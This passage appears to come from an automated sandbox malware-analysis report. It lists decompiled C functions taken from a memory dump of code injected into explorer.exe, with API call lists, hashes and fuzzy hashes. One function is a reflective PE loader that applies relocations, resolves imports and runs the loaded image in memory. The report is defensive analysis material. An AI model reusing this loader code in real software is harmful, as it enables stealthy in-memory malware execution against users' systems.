                                                                                                                                                                        • Instruction Fuzzy Hash: E5A13B71A01218EFDB11DFA4DC88BAE77B8EF89310F108269F905E7260DB789E45CB55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snprintfqsort
                                                                                                                                                                        • String ID: %I64d$false$null$true
                                                                                                                                                                        • API String ID: 756996078-4285102228
                                                                                                                                                                        • Opcode ID: 81ce7b408a547876594b29628a76b3cfc35a9fd64b4044da1df610377bf477c3
                                                                                                                                                                        • Instruction ID: 1534a3d01432a7b5239009b7ba7341132491e719338c537db21bca8f2e053817
                                                                                                                                                                        • Opcode Fuzzy Hash: 81ce7b408a547876594b29628a76b3cfc35a9fd64b4044da1df610377bf477c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 6EE18BB290020AFBDF219F64DC56FEF3B69EF54350F908024FE15D6141EA39DA619BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E007ADE26(WCHAR* __ecx) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                        				WCHAR* _v140;
                                                                                                                                                                        				WCHAR* _v144;
                                                                                                                                                                        				short _v664;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                        				WCHAR* _t36;
                                                                                                                                                                        				int _t40;
                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                        				int _t44;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				WCHAR* _t49;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				WCHAR* _t52;
                                                                                                                                                                        				void* _t53;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                        				_t51 = 0;
                                                                                                                                                                        				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                        				_t44 = _v8;
                                                                                                                                                                        				_t41 = 0;
                                                                                                                                                                        				_v12 = _t28;
                                                                                                                                                                        				if(_t44 <= 0) {
                                                                                                                                                                        					L22:
                                                                                                                                                                        					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                        					__eflags = _t29;
                                                                                                                                                                        					return _t29;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L1;
                                                                                                                                                                        				}
                                                                                                                                                                        				do {
                                                                                                                                                                        					L1:
                                                                                                                                                                        					_t49 =  *(_t28 + _t41 * 4);
                                                                                                                                                                        					_t30 =  *_t49 & 0x0000ffff;
                                                                                                                                                                        					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                                                                                        						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                                                                                        						_t40 = lstrlenW(_t49);
                                                                                                                                                                        						_t45 = 0;
                                                                                                                                                                        						if(_t40 <= 0) {
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_t44 = _v8;
                                                                                                                                                                        							_t51 = _t51 + 1;
                                                                                                                                                                        							goto L12;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							goto L8;
                                                                                                                                                                        						}
                                                                                                                                                                        						do {
                                                                                                                                                                        							L8:
                                                                                                                                                                        							if(_t49[_t45] == 0x2c) {
                                                                                                                                                                        								_t49[_t45] = 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                        						} while (_t45 < _t40);
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					L12:
                                                                                                                                                                        					_t28 = _v12;
                                                                                                                                                                        					_t41 = _t41 + 1;
                                                                                                                                                                        				} while (_t41 < _t44);
                                                                                                                                                                        				if(_t51 != 1) {
                                                                                                                                                                        					if(__eflags <= 0) {
                                                                                                                                                                        						goto L22;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t52 = _v140;
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                                                                                        						lstrcpynW(_v16, _t52, 0x104);
                                                                                                                                                                        					} else {
                                                                                                                                                                        						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t52);
                                                                                                                                                                        						_push(0x7bc9a0);
                                                                                                                                                                        						_t36 = E007A9A5A( &_v664);
                                                                                                                                                                        						_v12 = _t36;
                                                                                                                                                                        						lstrcpynW(_v16, _t36, 0x104);
                                                                                                                                                                        						E007A8BF4( &_v12, 0xfffffffe);
                                                                                                                                                                        					}
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t52 = _v144;
                                                                                                                                                                        				goto L17;
                                                                                                                                                                        			}






















                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 007ADE3B
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 007ADE46
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 007ADE88
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007ADEE1
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 007ADF06
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104), ref: 007ADF24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259063344-0
                                                                                                                                                                        • Opcode ID: 41b3a3d700c8e591c5fb09fbcab637836c3e89628b0dc86c4b23eaad495ad706
                                                                                                                                                                        • Instruction ID: 2edd1eeb9253dbe7eeab39bc38dca6c302c1b0b5ad944379a350fd1568667062
                                                                                                                                                                        • Opcode Fuzzy Hash: 41b3a3d700c8e591c5fb09fbcab637836c3e89628b0dc86c4b23eaad495ad706
                                                                                                                                                                        • Instruction Fuzzy Hash: BB31F271904116EADF34AB54C888FAEB7B8EF93311F108259F517E6064E7789E80CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AE66A
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 007AE672
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AE686
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AE701
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AE704
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AE709
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                        			E007B3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                        				signed short _v12;
                                                                                                                                                                        				intOrPtr* _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				signed int* _v24;
                                                                                                                                                                        				unsigned int _v28;
                                                                                                                                                                        				signed short* _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				intOrPtr* _v48;
                                                                                                                                                                        				signed short* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				unsigned int _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				_Unknown_base(*)()* _v68;
                                                                                                                                                                        				signed int _v72;
                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                        				unsigned int _v88;
                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                        				signed int _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                        				CHAR* _v116;
                                                                                                                                                                        				signed int _v120;
                                                                                                                                                                        				intOrPtr _v124;
                                                                                                                                                                        				signed int _v128;
                                                                                                                                                                        				signed int _v132;
                                                                                                                                                                        				signed int _t216;
                                                                                                                                                                        				signed int _t233;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        				signed int _t278;
                                                                                                                                                                        				signed int _t280;
                                                                                                                                                                        				intOrPtr _t320;
                                                                                                                                                                        
                                                                                                                                                                        				_v44 = _v44 & 0x00000000;
                                                                                                                                                                        				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                        				_v20 = _v84;
                                                                                                                                                                        				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                                                                                        				_v64 = _t320;
                                                                                                                                                                        				if(_t320 == 0) {
                                                                                                                                                                        					L13:
                                                                                                                                                                        					while(0 != 0) {
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(8);
                                                                                                                                                                        					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                                                                                        						L35:
                                                                                                                                                                        						if(_a16 == 0) {
                                                                                                                                                                        							L54:
                                                                                                                                                                        							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_a12 != 0) {
                                                                                                                                                                        								 *_a12 = _v80;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                                                                                        							_v124 = _v80(_a4, 1, _a8);
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v124 != 0) {
                                                                                                                                                                        								if(_v44 == 0) {
                                                                                                                                                                        									L77:
                                                                                                                                                                        									return 1;
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_a20 != 1) {
                                                                                                                                                                        									if(_a20 != 2) {
                                                                                                                                                                        										L75:
                                                                                                                                                                        										while(0 != 0) {
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L77;
                                                                                                                                                                        									}
                                                                                                                                                                        									while(0 != 0) {
                                                                                                                                                                        									}
                                                                                                                                                                        									_v132 = _v44;
                                                                                                                                                                        									goto L75;
                                                                                                                                                                        								}
                                                                                                                                                                        								while(0 != 0) {
                                                                                                                                                                        								}
                                                                                                                                                                        								_v44();
                                                                                                                                                                        								goto L75;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							return 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(8);
                                                                                                                                                                        						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v128 = 0x80000000;
                                                                                                                                                                        						_t216 = 8;
                                                                                                                                                                        						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
                                                                                                                                                                        						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                                                                                        						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                                                                                        						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						_v40 = _v40 & 0x00000000;
                                                                                                                                                                        						while(_v40 < _v104) {
                                                                                                                                                                        							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                                                                                        							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                                                                                        							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                                                                                        								_v40 = _v40 + 1;
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							_v44 = _v120;
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v44 != 0) {
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        						}
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						return 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v96 = 0x80000000;
                                                                                                                                                                        					_t233 = 8;
                                                                                                                                                                        					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                        						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                        						if(_v36 == 0) {
                                                                                                                                                                        							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                        							if( *_v16 == 0) {
                                                                                                                                                                        								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v24 =  *_v16 + _a4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v72 = _v72 & 0x00000000;
                                                                                                                                                                        							while( *_v24 != 0) {
                                                                                                                                                                        								if(( *_v24 & _v96) == 0) {
                                                                                                                                                                        									_v100 =  *_v24 + _a4;
                                                                                                                                                                        									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                                                                                        								}
                                                                                                                                                                        								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                        									 *_v24 = _v68;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v24 =  &(_v24[1]);
                                                                                                                                                                        								_v72 = _v72 + 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v16 = _v16 + 0x14;
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t273 = 0xfffffffd;
                                                                                                                                                                        							return _t273;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L35;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t278 = 8;
                                                                                                                                                                        				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
                                                                                                                                                                        				_t280 = 8;
                                                                                                                                                                        				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
                                                                                                                                                                        				while(0 != 0) {
                                                                                                                                                                        				}
                                                                                                                                                                        				while(_v56 > 0) {
                                                                                                                                                                        					_v28 = _v52[2];
                                                                                                                                                                        					_v56 = _v56 - _v28;
                                                                                                                                                                        					_v28 = _v28 - 8;
                                                                                                                                                                        					_v28 = _v28 >> 1;
                                                                                                                                                                        					_v32 =  &(_v52[4]);
                                                                                                                                                                        					_v92 = _a4 +  *_v52;
                                                                                                                                                                        					_v60 = _v28;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_v88 = _v60;
                                                                                                                                                                        						_v60 = _v60 - 1;
                                                                                                                                                                        						if(_v88 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                        						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                        						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                                                                                                                        						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                        							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                        								 *_v48 =  *_v48 + _v64;
                                                                                                                                                                        							}
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v32 =  &(_v32[1]);
                                                                                                                                                                        					}
                                                                                                                                                                        					_v52 = _v32;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L13;
                                                                                                                                                                        			}









































                                                                                                                                                                        0x007b3e48
                                                                                                                                                                        0x007b3e53
                                                                                                                                                                        0x007b3e53
                                                                                                                                                                        0x007b3e72
                                                                                                                                                                        0x007b3e72
                                                                                                                                                                        0x007b3e7a
                                                                                                                                                                        0x007b3e7a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 007B3ECD
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 007B3EE6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007B3F42
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007B3F61
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00000000), ref: 007B4052
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1872726118-0
                                                                                                                                                                        • Opcode ID: 1b6b54f28faaac744ff96398064933b1a8a2e96174a4fb465988ec3545b01749
                                                                                                                                                                        • Instruction ID: 1e73c632d7c9a74c6858052457249d31726d39e1768ebf2fa1c66ac3781fc49c
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b6b54f28faaac744ff96398064933b1a8a2e96174a4fb465988ec3545b01749
                                                                                                                                                                        • Instruction Fuzzy Hash: 3EE18F74E04209DFDB14DFA8C984BEDBBF1FF08314F24856AE915AB251D738AA81CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E007AE400(void* __ecx) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				char* _t15;
                                                                                                                                                                        				intOrPtr* _t16;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				intOrPtr* _t23;
                                                                                                                                                                        				intOrPtr* _t24;
                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                        				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                        				_t15 =  &_v12;
                                                                                                                                                                        				__imp__CoCreateInstance(0x7bc868, 0, 1, 0x7bc878, _t15);
                                                                                                                                                                        				if(_t15 < 0) {
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_t23 = _v8;
                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t24 = _v12;
                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t16 = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					__imp__#2(__ecx);
                                                                                                                                                                        					_t25 = _v12;
                                                                                                                                                                        					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                        					if(_t21 < 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                        						if(_t21 < 0) {
                                                                                                                                                                        							goto L5;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t16 = E007A8BDE(8);
                                                                                                                                                                        							if(_t16 == 0) {
                                                                                                                                                                        								goto L5;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                        								 *_t16 = _v8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t16;
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE413
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE424
                                                                                                                                                                        • CoCreateInstance.OLE32(007BC868,00000000,00000001,007BC878,?,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE43B
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AE446
                                                                                                                                                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE471
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1610782348-0
                                                                                                                                                                        • Opcode ID: c9c260d43bb958897c1676aece40122ed2497c5082e623f19fe9357f2320f37d
                                                                                                                                                                        • Instruction ID: 2274a6f7e3338f9b219dfc79a44a233041ebfd324dc7e7a7a84721c591b3f5a9
                                                                                                                                                                        • Opcode Fuzzy Hash: c9c260d43bb958897c1676aece40122ed2497c5082e623f19fe9357f2320f37d
                                                                                                                                                                        • Instruction Fuzzy Hash: 41212C70600289BBDB249B66DC4DE5BBF7CEFC7B25F10825CB615E6290D6789A00D670
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                        			E007B3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				char* _t31;
                                                                                                                                                                        				char* _t33;
                                                                                                                                                                        				char* _t35;
                                                                                                                                                                        				char* _t37;
                                                                                                                                                                        				char* _t38;
                                                                                                                                                                        				long long* _t40;
                                                                                                                                                                        
                                                                                                                                                                        				_t30 = __edi;
                                                                                                                                                                        				_t12 = _a20;
                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                        					_t12 = 0x11;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t35 = _a4;
                                                                                                                                                                        				_push(_t25);
                                                                                                                                                                        				 *_t40 = _a12;
                                                                                                                                                                        				_push(_t12);
                                                                                                                                                                        				_push("%.*g");
                                                                                                                                                                        				_push(_a8);
                                                                                                                                                                        				_push(_t35);
                                                                                                                                                                        				L007B34D2();
                                                                                                                                                                        				_t23 = _t12;
                                                                                                                                                                        				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                        					L16:
                                                                                                                                                                        					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                        					goto L17;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E007B3352(_t12, _t35);
                                                                                                                                                                        					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                        						L8:
                                                                                                                                                                        						_push(_t30);
                                                                                                                                                                        						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                        						_t31 = _t37;
                                                                                                                                                                        						if(_t37 == 0) {
                                                                                                                                                                        							L15:
                                                                                                                                                                        							_t13 = _t23;
                                                                                                                                                                        							L17:
                                                                                                                                                                        							return _t13;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t38 = _t37 + 1;
                                                                                                                                                                        						_t33 = _t31 + 2;
                                                                                                                                                                        						if( *_t38 == 0x2d) {
                                                                                                                                                                        							_t38 = _t33;
                                                                                                                                                                        						}
                                                                                                                                                                        						while( *_t33 == 0x30) {
                                                                                                                                                                        							_t33 = _t33 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t33 != _t38) {
                                                                                                                                                                        							E007A8CE0(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                        							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t6 = _t23 + 3; // 0x7b1b64
                                                                                                                                                                        						_t12 = _t6;
                                                                                                                                                                        						if(_t12 >= _a8) {
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t35[_t23] = 0x302e;
                                                                                                                                                                        						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                        						_t23 = _t23 + 2;
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strchr$_snprintf
                                                                                                                                                                        • String ID: %.*g
                                                                                                                                                                        • API String ID: 3619936089-952554281
                                                                                                                                                                        • Opcode ID: adcecd7e12ca0ed9c33bc635c3d3a4e7797b90d478cde49d54e18a93abca712d
                                                                                                                                                                        • Instruction ID: c80dcbf769f5974ee761d24bff0f83071fe1f4392b6151aedfb54aed4d0910c5
                                                                                                                                                                        • Opcode Fuzzy Hash: adcecd7e12ca0ed9c33bc635c3d3a4e7797b90d478cde49d54e18a93abca712d
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E2132626446947ADB324A28DC86FEB3B88AF013A0F184125F9449B181EAADDFD443A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 007AE963
                                                                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 007AE972
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ArrayBoundSafe
                                                                                                                                                                        • String ID: z
                                                                                                                                                                        • API String ID: 62119774-3404383249
